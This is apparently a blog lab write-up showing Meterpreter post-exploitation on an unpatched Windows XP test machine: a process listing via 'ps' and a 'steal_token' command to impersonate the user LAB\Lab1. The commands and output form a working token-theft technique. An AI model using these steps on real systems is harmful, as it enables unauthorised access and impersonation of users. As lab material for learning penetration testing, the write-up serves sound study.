Metasploit Meterpreter: Using ps and stealing Kerberos tokens

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

meterpreter > ps <–Lists applications running

Process List
============

PID PPID Name Arch Session User Path
— —- —- —- ——- —- —-
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
192 1032 snmp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\snmp.exe
468 1032 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
512 1032 vmnat.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\vmnat.exe
536 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
580 1032 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
588 1032 vmnetdhcp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\vmnetdhcp.exe
680 1032 vmware-authd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Player\vmware-authd.exe
696 1032 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
788 128 explorer.exe x86 0 LAB\Lab1 C:\WINDOWS\Explorer.EXE
860 536 wscntfy.exe x86 0 LAB\Lab1 C:\WINDOWS\system32\wscntfy.exe
892 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
964 892 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
988 892 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
1032 988 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
1044 988 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
1216 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1272 1032 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1436 988 logon.scr x86 0 LAB\Lab1 C:\WINDOWS\System32\logon.scr
1460 1032 sqlbrowser.exe x86 0 NT AUTHORITY\SYSTEM c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
1508 1032 vmware-usbarbitrator.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\VMware\USB\vmware-usbarbitrator.exe
1652 1032 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1928 1032 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
1968 1032 sqlservr.exe x86 0 NT AUTHORITY\SYSTEM c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
2080 788 hqtray.exe x86 0 LAB\Lab1 C:\Program Files\VMware\VMware Player\hqtray.exe
2424 2396 ACpwO.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\ACpwO.exe
3376 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe

I’ve decided to steal the PID token for the user LAB1 (1436 988 logon.scr x86 0 LAB\Lab1 C:\WINDOWS\System32\logon.scr)

Meterpreter > steal_token 1436
Stolen token with username: LAB\Lab1

I believe I have now assumed the role of LAB1 and Meterpreter is running under the context of that user.